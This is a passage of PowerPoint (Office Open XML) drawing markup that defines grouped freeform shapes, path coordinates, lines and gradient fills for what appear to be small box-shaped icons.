                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FC8EA12-A1E5-4F0E-946C-F6465C7BF2C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76" y="-3102"/>
                <a:ext cx="452" cy="156"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 452 w 452"/>
                  <a:gd name="T1" fmla="*/ 156 h 156"/>
                  <a:gd name="T2" fmla="*/ 0 w 452"/>
                  <a:gd name="T3" fmla="*/ 35 h 156"/>
                  <a:gd name="T4" fmla="*/ 0 w 452"/>
                  <a:gd name="T5" fmla="*/ 0 h 156"/>
                  <a:gd name="T6" fmla="*/ 452 w 452"/>
                  <a:gd name="T7" fmla="*/ 123 h 156"/>
                  <a:gd name="T8" fmla="*/ 452 w 452"/>
                  <a:gd name="T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2" h="156">
                    <a:moveTo>
                      <a:pt x="452" y="156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452" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="15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54" name="Freeform 1696">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA5791CE-27A4-497E-9927-DFA59F3D460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38" y="-3140"/>
                <a:ext cx="517" cy="139"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 517"/>
                  <a:gd name="T1" fmla="*/ 38 h 139"/>
                  <a:gd name="T2" fmla="*/ 383 w 517"/>
                  <a:gd name="T3" fmla="*/ 139 h 139"/>
                  <a:gd name="T4" fmla="*/ 517 w 517"/>
                  <a:gd name="T5" fmla="*/ 104 h 139"/>
                  <a:gd name="T6" fmla="*/ 135 w 517"/>
                  <a:gd name="T7" fmla="*/ 0 h 139"/>
                  <a:gd name="T8" fmla="*/ 0 w 517"/>
                  <a:gd name="T9" fmla="*/ 3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7" h="139">
                    <a:moveTo>
                      <a:pt x="0" y="38"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="383" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="517" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3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603" name="Line 1739">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D7AA086-545D-4180-AE9B-FD7ABEBFB0E3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9481030" y="2057079"/>
              <a:ext cx="0" cy="142875"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="FF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04" name="Group 1726">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A03C290-D389-4DCD-9B90-74B3B6C02B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15904" y="1841173"/>
              <a:ext cx="457200" cy="268290"/>
              <a:chOff x="-1948" y="-2460"/>
              <a:chExt cx="1368" cy="801"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2035" name="Freeform 1727">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC1B61BE-ACAE-454A-BF43-17C9719BAFA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1662" y="-2460"/>
                <a:ext cx="498" cy="622"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 211"/>
                  <a:gd name="T1" fmla="*/ 8 h 263"/>
                  <a:gd name="T2" fmla="*/ 14 w 211"/>
                  <a:gd name="T3" fmla="*/ 207 h 263"/>
                  <a:gd name="T4" fmla="*/ 192 w 211"/>
                  <a:gd name="T5" fmla="*/ 254 h 263"/>
                  <a:gd name="T6" fmla="*/ 192 w 211"/>
                  <a:gd name="T7" fmla="*/ 56 h 263"/>
                  <a:gd name="T8" fmla="*/ 14 w 211"/>
                  <a:gd name="T9" fmla="*/ 8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1" h="263">
                    <a:moveTo>
                      <a:pt x="14" y="8"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="16"/>
                      <a:pt x="1" y="187"/>
                      <a:pt x="14" y="207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="226"/>
                      <a:pt x="179" y="263"/>
                      <a:pt x="192" y="254"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="204" y="246"/>
                      <a:pt x="211" y="94"/>
                      <a:pt x="192" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="185" y="42"/>
                      <a:pt x="28" y="0"/>
                      <a:pt x="14" y="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36" name="Freeform 1728">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3806BBD6-0755-4997-A207-2382DF2BB74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1599" y="-2398"/>
                <a:ext cx="359" cy="493"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 359"/>
                  <a:gd name="T1" fmla="*/ 0 h 493"/>
                  <a:gd name="T2" fmla="*/ 0 w 359"/>
                  <a:gd name="T3" fmla="*/ 397 h 493"/>
                  <a:gd name="T4" fmla="*/ 359 w 359"/>
                  <a:gd name="T5" fmla="*/ 493 h 493"/>
                  <a:gd name="T6" fmla="*/ 359 w 359"/>
                  <a:gd name="T7" fmla="*/ 97 h 493"/>
                  <a:gd name="T8" fmla="*/ 0 w 359"/>
                  <a:gd name="T9" fmla="*/ 0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9" h="493">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="359" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="359" y="97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69A2E1"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="69A2E1">
                      <a:gamma/>
                      <a:tint val="70588"/>
                      <a:invGamma/>
                    </a:srgbClr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37" name="Freeform 1729">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8642F5DF-3345-4D5E-ADF0-05464946792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1629" y="-2457"/>
                <a:ext cx="479" cy="153"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 99 w 203"/>
                  <a:gd name="T1" fmla="*/ 15 h 65"/>
                  <a:gd name="T2" fmla="*/ 27 w 203"/>
                  <a:gd name="T3" fmla="*/ 0 h 65"/>
                  <a:gd name="T4" fmla="*/ 0 w 203"/>
                  <a:gd name="T5" fmla="*/ 7 h 65"/>
                  <a:gd name="T6" fmla="*/ 0 w 203"/>
                  <a:gd name="T7" fmla="*/ 7 h 65"/>
                  <a:gd name="T8" fmla="*/ 0 w 203"/>
                  <a:gd name="T9" fmla="*/ 7 h 65"/>
                  <a:gd name="T10" fmla="*/ 178 w 203"/>
                  <a:gd name="T11" fmla="*/ 55 h 65"/>
                  <a:gd name="T12" fmla="*/ 203 w 203"/>
                  <a:gd name="T13" fmla="*/ 48 h 65"/>
                  <a:gd name="T14" fmla="*/ 99 w 203"/>
                  <a:gd name="T15" fmla="*/ 1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3" h="65">
                    <a:moveTo>
                      <a:pt x="99" y="15"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="2"/>
                      <a:pt x="27" y="0"/>
                      <a:pt x="27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2" y="0"/>
                      <a:pt x="168" y="44"/>
                      <a:pt x="178" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="188" y="65"/>
                      <a:pt x="203" y="48"/>
                      <a:pt x="203" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="203" y="48"/>
                      <a:pt x="163" y="29"/>
                      <a:pt x="99" y="1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38" name="Freeform 1730">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DF404D1-8BD4-4D23-8984-527D328CB19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1209" y="-2344"/>
                <a:ext cx="352" cy="484"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 149"/>
                  <a:gd name="T1" fmla="*/ 205 h 205"/>
                  <a:gd name="T2" fmla="*/ 15 w 149"/>
                  <a:gd name="T3" fmla="*/ 201 h 205"/>
                  <a:gd name="T4" fmla="*/ 129 w 149"/>
                  <a:gd name="T5" fmla="*/ 150 h 205"/>
                  <a:gd name="T6" fmla="*/ 149 w 149"/>
                  <a:gd name="T7" fmla="*/ 112 h 205"/>
                  <a:gd name="T8" fmla="*/ 149 w 149"/>
                  <a:gd name="T9" fmla="*/ 60 h 205"/>
                  <a:gd name="T10" fmla="*/ 25 w 149"/>
                  <a:gd name="T11" fmla="*/ 0 h 205"/>
                  <a:gd name="T12" fmla="*/ 0 w 149"/>
                  <a:gd name="T13" fmla="*/ 7 h 205"/>
                  <a:gd name="T14" fmla="*/ 0 w 149"/>
                  <a:gd name="T15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9" h="205">
                    <a:moveTo>
                      <a:pt x="0" y="205"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="201"/>
                      <a:pt x="15" y="201"/>
                      <a:pt x="15" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="129" y="150"/>
                      <a:pt x="129" y="150"/>
                      <a:pt x="129" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="149" y="112"/>
                      <a:pt x="149" y="112"/>
                      <a:pt x="149" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="149" y="60"/>
                      <a:pt x="149" y="60"/>
                      <a:pt x="149" y="6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3" y="35"/>
                      <a:pt x="20" y="189"/>
                      <a:pt x="0" y="20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39" name="Freeform 1731">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C42F7D5-B481-4324-B623-EA5D259E9D1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1948" y="-1964"/>
                <a:ext cx="661" cy="175"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 661"/>
                  <a:gd name="T1" fmla="*/ 52 h 175"/>
                  <a:gd name="T2" fmla="*/ 208 w 661"/>
                  <a:gd name="T3" fmla="*/ 0 h 175"/>
                  <a:gd name="T4" fmla="*/ 661 w 661"/>
                  <a:gd name="T5" fmla="*/ 121 h 175"/>
                  <a:gd name="T6" fmla="*/ 453 w 661"/>
                  <a:gd name="T7" fmla="*/ 175 h 175"/>
                  <a:gd name="T8" fmla="*/ 0 w 661"/>
                  <a:gd name="T9" fmla="*/ 52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1" h="175">
                    <a:moveTo>
                      <a:pt x="0" y="52"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="208" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5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40" name="Freeform 1732">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92B63795-16F9-477C-A2D3-2FB399EE824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1495" y="-1843"/>
                <a:ext cx="199" cy="87"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 199"/>
                  <a:gd name="T1" fmla="*/ 54 h 87"/>
                  <a:gd name="T2" fmla="*/ 0 w 199"/>
                  <a:gd name="T3" fmla="*/ 87 h 87"/>
                  <a:gd name="T4" fmla="*/ 199 w 199"/>
                  <a:gd name="T5" fmla="*/ 35 h 87"/>
                  <a:gd name="T6" fmla="*/ 199 w 199"/>
                  <a:gd name="T7" fmla="*/ 0 h 87"/>
                  <a:gd name="T8" fmla="*/ 0 w 199"/>
                  <a:gd name="T9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9" h="87">
                    <a:moveTo>
                      <a:pt x="0" y="54"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5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41" name="Freeform 1733">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36502DE8-89AF-44E3-B3E2-29A7DB902D8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1948" y="-1912"/>
                <a:ext cx="453" cy="156"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 453 w 453"/>
                  <a:gd name="T1" fmla="*/ 156 h 156"/>
                  <a:gd name="T2" fmla="*/ 0 w 453"/>
                  <a:gd name="T3" fmla="*/ 36 h 156"/>
                  <a:gd name="T4" fmla="*/ 0 w 453"/>
                  <a:gd name="T5" fmla="*/ 0 h 156"/>
                  <a:gd name="T6" fmla="*/ 453 w 453"/>
                  <a:gd name="T7" fmla="*/ 123 h 156"/>
                  <a:gd name="T8" fmla="*/ 453 w 453"/>
                  <a:gd name="T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3" h="156">
                    <a:moveTo>
                      <a:pt x="453" y="156"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="15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42" name="Freeform 1734">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56D595E0-B76E-4496-ACB3-B4EA37CF8ED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1884" y="-1949"/>
                <a:ext cx="517" cy="139"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 517"/>
                  <a:gd name="T1" fmla="*/ 37 h 139"/>
                  <a:gd name="T2" fmla="*/ 382 w 517"/>
                  <a:gd name="T3" fmla="*/ 139 h 139"/>
                  <a:gd name="T4" fmla="*/ 517 w 517"/>
                  <a:gd name="T5" fmla="*/ 101 h 139"/>
                  <a:gd name="T6" fmla="*/ 134 w 517"/>
                  <a:gd name="T7" fmla="*/ 0 h 139"/>
                  <a:gd name="T8" fmla="*/ 0 w 517"/>
                  <a:gd name="T9" fmla="*/ 37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7" h="139">
                    <a:moveTo>
                      <a:pt x="0" y="37"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="382" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="517" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3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43" name="Freeform 1735">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60372723-9118-4554-B5F4-D93C4CC8B87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1034" y="-2247"/>
                <a:ext cx="454" cy="588"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 454"/>
                  <a:gd name="T1" fmla="*/ 120 h 588"/>
                  <a:gd name="T2" fmla="*/ 0 w 454"/>
                  <a:gd name="T3" fmla="*/ 588 h 588"/>
                  <a:gd name="T4" fmla="*/ 454 w 454"/>
                  <a:gd name="T5" fmla="*/ 468 h 588"/>
                  <a:gd name="T6" fmla="*/ 454 w 454"/>
                  <a:gd name="T7" fmla="*/ 0 h 588"/>
                  <a:gd name="T8" fmla="*/ 0 w 454"/>
                  <a:gd name="T9" fmla="*/ 120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4" h="588">
                    <a:moveTo>
                      <a:pt x="0" y="120"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="468"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="12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44" name="Freeform 1736">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EE249FB-02C0-47D1-808B-0DF83CEF6DE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1258" y="-2188"/>
                <a:ext cx="224" cy="529"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 224"/>
                  <a:gd name="T1" fmla="*/ 0 h 529"/>
                  <a:gd name="T2" fmla="*/ 0 w 224"/>
                  <a:gd name="T3" fmla="*/ 470 h 529"/>
                  <a:gd name="T4" fmla="*/ 224 w 224"/>
                  <a:gd name="T5" fmla="*/ 529 h 529"/>
                  <a:gd name="T6" fmla="*/ 224 w 224"/>
                  <a:gd name="T7" fmla="*/ 61 h 529"/>
                  <a:gd name="T8" fmla="*/ 0 w 224"/>
                  <a:gd name="T9" fmla="*/ 0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4" h="529">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="529"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="61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45" name="Freeform 1737">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6322572-12F0-4AF5-846B-500C2144B03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1258" y="-2309"/>
                <a:ext cx="678" cy="182"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 678"/>
                  <a:gd name="T1" fmla="*/ 121 h 182"/>
                  <a:gd name="T2" fmla="*/ 451 w 678"/>
                  <a:gd name="T3" fmla="*/ 0 h 182"/>
                  <a:gd name="T4" fmla="*/ 678 w 678"/>
                  <a:gd name="T5" fmla="*/ 62 h 182"/>
                  <a:gd name="T6" fmla="*/ 224 w 678"/>
                  <a:gd name="T7" fmla="*/ 182 h 182"/>
                  <a:gd name="T8" fmla="*/ 0 w 678"/>
                  <a:gd name="T9" fmla="*/ 121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8" h="182">
                    <a:moveTo>
                      <a:pt x="0" y="121"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="451" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="678" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="12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46" name="Freeform 1738">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34DDA31F-138A-4FB6-BB18-54C21D375AB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1228" y="-2134"/>
                <a:ext cx="156" cy="88"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 156"/>
                  <a:gd name="T1" fmla="*/ 0 h 88"/>
                  <a:gd name="T2" fmla="*/ 0 w 156"/>
                  <a:gd name="T3" fmla="*/ 48 h 88"/>
                  <a:gd name="T4" fmla="*/ 156 w 156"/>
                  <a:gd name="T5" fmla="*/ 88 h 88"/>
                  <a:gd name="T6" fmla="*/ 156 w 156"/>
                  <a:gd name="T7" fmla="*/ 43 h 88"/>
                  <a:gd name="T8" fmla="*/ 0 w 156"/>
                  <a:gd name="T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88">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="43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605" name="Line 1768">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB7794E8-9EEF-4CA7-84A1-26E55E6D255C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9012717" y="1912617"/>
              <a:ext cx="0" cy="142875"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="FF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06" name="Group 1740">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCA9ACBE-3B54-4B29-A1FC-7BEDC6B066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96817" y="1771321"/>
              <a:ext cx="341314" cy="220661"/>
              <a:chOff x="126" y="1682"/>
              <a:chExt cx="646" cy="417"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2027" name="Freeform 1741">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14C0F0F2-4FCD-4F6C-BC70-73916C54DED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5" y="1682"/>
                <a:ext cx="295" cy="368"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 211"/>
                  <a:gd name="T1" fmla="*/ 8 h 263"/>
                  <a:gd name="T2" fmla="*/ 14 w 211"/>
                  <a:gd name="T3" fmla="*/ 207 h 263"/>
                  <a:gd name="T4" fmla="*/ 192 w 211"/>
                  <a:gd name="T5" fmla="*/ 254 h 263"/>
                  <a:gd name="T6" fmla="*/ 192 w 211"/>
                  <a:gd name="T7" fmla="*/ 56 h 263"/>
                  <a:gd name="T8" fmla="*/ 14 w 211"/>
                  <a:gd name="T9" fmla="*/ 8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1" h="263">
                    <a:moveTo>
                      <a:pt x="14" y="8"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="16"/>
                      <a:pt x="1" y="187"/>
                      <a:pt x="14" y="207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="226"/>
                      <a:pt x="179" y="263"/>
                      <a:pt x="192" y="254"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="204" y="246"/>
                      <a:pt x="211" y="94"/>
                      <a:pt x="192" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="185" y="42"/>
                      <a:pt x="28" y="0"/>
                      <a:pt x="14" y="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28" name="Freeform 1742">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61C9D0C4-3E65-4A3F-9275-32E7B7878F3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3" y="1719"/>
                <a:ext cx="212" cy="291"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 359"/>
                  <a:gd name="T1" fmla="*/ 0 h 493"/>
                  <a:gd name="T2" fmla="*/ 0 w 359"/>
                  <a:gd name="T3" fmla="*/ 397 h 493"/>
                  <a:gd name="T4" fmla="*/ 359 w 359"/>
                  <a:gd name="T5" fmla="*/ 493 h 493"/>
                  <a:gd name="T6" fmla="*/ 359 w 359"/>
                  <a:gd name="T7" fmla="*/ 97 h 493"/>
                  <a:gd name="T8" fmla="*/ 0 w 359"/>
                  <a:gd name="T9" fmla="*/ 0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9" h="493">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="359" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="359" y="97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69A2E1"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="69A2E1">
                      <a:gamma/>
                      <a:tint val="60784"/>
                      <a:invGamma/>
                    </a:srgbClr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29" name="Freeform 1743">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A22A907-1C1E-4BD0-97F7-0C979C17470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5" y="1684"/>
                <a:ext cx="284" cy="90"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 99 w 203"/>
                  <a:gd name="T1" fmla="*/ 15 h 65"/>
                  <a:gd name="T2" fmla="*/ 27 w 203"/>
                  <a:gd name="T3" fmla="*/ 0 h 65"/>
                  <a:gd name="T4" fmla="*/ 0 w 203"/>
                  <a:gd name="T5" fmla="*/ 7 h 65"/>
                  <a:gd name="T6" fmla="*/ 0 w 203"/>
                  <a:gd name="T7" fmla="*/ 7 h 65"/>
                  <a:gd name="T8" fmla="*/ 0 w 203"/>
                  <a:gd name="T9" fmla="*/ 7 h 65"/>
                  <a:gd name="T10" fmla="*/ 178 w 203"/>
                  <a:gd name="T11" fmla="*/ 55 h 65"/>
                  <a:gd name="T12" fmla="*/ 203 w 203"/>
                  <a:gd name="T13" fmla="*/ 48 h 65"/>
                  <a:gd name="T14" fmla="*/ 99 w 203"/>
                  <a:gd name="T15" fmla="*/ 1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3" h="65">
                    <a:moveTo>
                      <a:pt x="99" y="15"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="2"/>
                      <a:pt x="27" y="0"/>
                      <a:pt x="27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2" y="0"/>
                      <a:pt x="168" y="44"/>
                      <a:pt x="178" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="188" y="65"/>
                      <a:pt x="203" y="48"/>
                      <a:pt x="203" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="203" y="48"/>
                      <a:pt x="163" y="29"/>
                      <a:pt x="99" y="1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30" name="Freeform 1744">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F61D2C86-2026-423D-94F8-FC30F5B3F85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64" y="1751"/>
                <a:ext cx="208" cy="286"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 149"/>
                  <a:gd name="T1" fmla="*/ 205 h 205"/>
                  <a:gd name="T2" fmla="*/ 15 w 149"/>
                  <a:gd name="T3" fmla="*/ 201 h 205"/>
                  <a:gd name="T4" fmla="*/ 129 w 149"/>
                  <a:gd name="T5" fmla="*/ 150 h 205"/>
                  <a:gd name="T6" fmla="*/ 149 w 149"/>
                  <a:gd name="T7" fmla="*/ 112 h 205"/>
                  <a:gd name="T8" fmla="*/ 149 w 149"/>
                  <a:gd name="T9" fmla="*/ 60 h 205"/>
                  <a:gd name="T10" fmla="*/ 25 w 149"/>
                  <a:gd name="T11" fmla="*/ 0 h 205"/>
                  <a:gd name="T12" fmla="*/ 0 w 149"/>
                  <a:gd name="T13" fmla="*/ 7 h 205"/>
                  <a:gd name="T14" fmla="*/ 0 w 149"/>
                  <a:gd name="T15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9" h="205">
                    <a:moveTo>
                      <a:pt x="0" y="205"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="201"/>
                      <a:pt x="15" y="201"/>
                      <a:pt x="15" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="129" y="150"/>
                      <a:pt x="129" y="150"/>
                      <a:pt x="129" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="149" y="112"/>
                      <a:pt x="149" y="112"/>
                      <a:pt x="149" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="149" y="60"/>
                      <a:pt x="149" y="60"/>
                      <a:pt x="149" y="6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3" y="35"/>
                      <a:pt x="20" y="189"/>
                      <a:pt x="0" y="20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31" name="Freeform 1745">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74302B3C-87A2-4451-BDC4-77B6E7012FC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6" y="1976"/>
                <a:ext cx="391" cy="103"/>
              </a:xfrm>
              <a:custGeom>
